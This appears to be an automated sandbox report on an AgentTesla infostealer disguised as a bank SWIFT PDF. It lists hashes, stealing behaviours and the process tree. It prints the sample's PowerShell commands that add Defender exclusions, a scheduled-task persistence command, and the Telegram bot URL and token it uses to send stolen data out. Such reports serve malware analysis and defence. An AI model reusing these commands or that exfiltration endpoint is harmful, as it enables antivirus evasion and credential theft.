Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
27/12/2022, 14:34 UTC
221227-rxqn8afa54 1027/12/2022, 14:34 UTC
221227-rxfh9afa52 1025/12/2022, 11:46 UTC
221225-nxcwksee8w 10Analysis
-
max time kernel
81s -
max time network
148s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
-
submitted
25/12/2022, 11:46 UTC
General
-
Target
HSBC_Swift_Copy.pdf.exe
-
Size
1001KB
-
MD5
ce3718f0a5cd81530496e4724857b0cb
-
SHA1
17aca36e82674bd55a48684acc4eef6cd02696b1
-
SHA256
980572025579ff98c1ab84aa8c0c045e075d174bc5bb166e2694590c98f90a54
-
SHA512
6f30e90a5b9412a24f9513690cfca60c57f2e615604a12ddb7e355bd80894b7f3a37d8242813c76484a258db588c3df25f193a556284c3408d98c92ae814f724
-
SSDEEP
12288:bZ+2iN1/Sr+pGrnU9xmh873NdbE9QJKQZdF+LHZnbNFphh26mdOAH8c+9epf+mDG:Q1e+gnU9cOrjEw5Zupbxhh26mlH80q
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe"C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\TBcRbJIkEv.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBcRbJIkEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3C0F.tmp"2⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe"C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe"2⤵
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
Network
-
DNSapi.telegram.orgRemote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220 -
POSThttps://api.telegram.org/bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/sendDocumentRemote address:149.154.167.220:443RequestPOST /bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dae66dd88a0dba
Host: api.telegram.org
Content-Length: 2487
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 25 Dec 2022 11:47:52 GMT
Content-Type: application/json
Content-Length: 648
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
13.89.179.9:443
-
93.184.221.240:80
-
149.154.167.220:443https://api.telegram.org/bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/sendDocumenttls, http
HTTP Request
POST https://api.telegram.org/bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/sendDocumentHTTP Response
200
-
8.8.8.8:53api.telegram.orgdns
DNS Request
api.telegram.org
DNS Response
149.154.167.220
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50c2899d7c6746f42d5bbe088c777f94c
SHA1622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA2565b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078
-
Filesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
Filesize
18KB
MD57976b84d4ad6a98fa7676aef510783f7
SHA1cfcb4653aeceaba99ab89d71e8fb2ff01507829c
SHA256511f5ab9edbb7e2bfe0583fdd81bc63f51f9082ae142c7fcc23b4700139c8c72
SHA51251a5fba60289fe5a5395c336e197ad10f4dd849f72c8d7c3fd739a4e028a55e46fb437a9c69103c45d3da37751a402b9f5e144cb50a538e8509afe052660b1cd
-
Filesize
1KB
MD5db78c133378b9c9074e15e098ec84888
SHA1359fc0af75d27f7727e2184b9a9eb21343156d31
SHA256279eb4551f81460f22f08925969f33f33073fbec4874e9b029f987eed5cb7919
SHA512249842c1b62eeb3e691cc342ae66e001d4845e86be32efc6081d75d4bd668c7c306a07defd3547937a58c693d59474b5d0523d03ad063f7c266a06a824501b4b
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1024KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
5.0MB
-
Filesize
1.6MB
-
Filesize
584KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
40KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
64KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
40KB
-
Filesize
1.6MB
-
Filesize
424KB
-
Filesize
624KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
192KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
204KB
-
Filesize
216KB
-
Filesize
592KB
-
Filesize
660KB
-
Filesize
112KB
-
Filesize
472KB
-
Filesize
300KB
-
Filesize
120KB
-
Filesize
6.2MB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
136KB
-
Filesize
96KB
-
Filesize
192KB
-
Filesize
320KB